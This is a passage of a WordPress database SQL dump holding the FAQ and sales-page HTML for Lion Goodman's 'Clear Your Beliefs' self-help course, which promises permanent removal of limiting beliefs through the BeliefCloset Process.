pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<h3 class="widget-title">CYB banner header</h3>			 <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">', 'p', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 12:54:45', '2015-05-12 17:54:45', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2169, 2, '2015-05-12 12:59:07', '2015-05-12 17:59:07', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to 